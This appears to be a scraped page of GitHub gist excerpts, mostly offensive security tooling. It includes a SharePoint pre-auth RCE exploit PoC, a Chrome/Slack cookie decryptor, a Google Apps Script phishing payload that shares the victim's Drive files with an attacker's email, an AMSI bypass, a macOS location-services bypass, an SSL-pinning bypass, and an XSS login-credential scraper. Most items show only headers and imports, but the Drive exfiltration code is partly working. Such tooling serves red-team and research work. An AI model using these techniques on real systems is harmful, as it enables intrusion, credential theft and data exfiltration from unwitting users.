WKL-Sec / ParentProcessValidator.cpp
Created February 9, 2024 13:47
This C++ code snippet demonstrates how to verify whether an executable was launched by explorer.exe, as a guardrail during red team operations.
# White Knight Labs - Offensive Development
# Guardrails - Parent Process Check
#include <windows.h>
#include <tlhelp32.h>
#include <psapi.h>
#include <tchar.h>
#include <iostream>
// Function to get the ID of the parent process
testanull / SharePwn_public.py
Created December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
Tw1sm / decrypt_cookies.py
Last active November 13, 2023 22:55
Decrypt Slack/Chrome Cookies
import sqlite3
import sys
import json
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
kSalt = "saltysalt"
kDerivedKeySizeInBits = 128
kEncryptionIterations = 1003
kEncryptionVersionPrefix = "v10"
ahhh / driveSearch.gs
Last active June 16, 2023 00:55
Google Apps Script Phishing #2
function driveSearch() {
// Setup the exfil folder
var user = Session.getActiveUser().getEmail();
var folder = DriveApp.createFolder(user);
var attackerEmail = "ahhh.db@gmail.com";
folder.addViewer(attackerEmail);
// Search Drive
var files = DriveApp.searchFiles('hidden = false');
// Iterate through files in Drive
susMdT / Program.cs
Created February 24, 2023 02:57
C# AMSI bypass with hardware breakpoint
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
// CCOB IS THE GOAT
theevilbit / cve_2022_22655_mount_locationd.sh
Last active December 22, 2023 23:24
CVE-2022-22655 - macOS Location Services Bypass
#!/bin/zsh
echo "++ Stopping locationd"
sudo launchctl stop com.apple.locationd
echo "++ Dropping swiftliverpool"
echo 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
jhaddix / reconftw.cfg
Last active April 13, 2024 20:42
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator
incogbyte / mixunpin.js
Last active April 19, 2024 22:17
Frida script to bypass common methods of SSL pinning on Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that SSL pinning can be custom, and sometimes you need to reverse-engineer it using Ghidra, IDA or a similar tool.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
bja2142 / gist:e60cb46b358d74c4801d5ae05fa76c07
Created August 17, 2022 21:37
Kill all users who are using more than a fixed number of processes on Linux
MAX_PROCESS_LIMIT=10
systemctl status user.slice |
egrep "user-[0-9]+\.slice" |
sed 's/.*user-\([0-9]*\).*/\1/' | # get uid
while read uid; do
test $uid -ne 0 && ( # ignore root
tasks=$(
systemctl status user-${uid}.slice |
grep -e Tasks 2>&1 |
sed 's/\w*Tasks: \([1-9][0-9]*\) (limit: [0-9]*)/\1/'
hoodoer / stealCredsPayload.js
Last active March 1, 2024 14:52
XSS Login Form Credential Scraper
alert('Click ok when you\'re ready to enter iframe trap');
// Example Credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer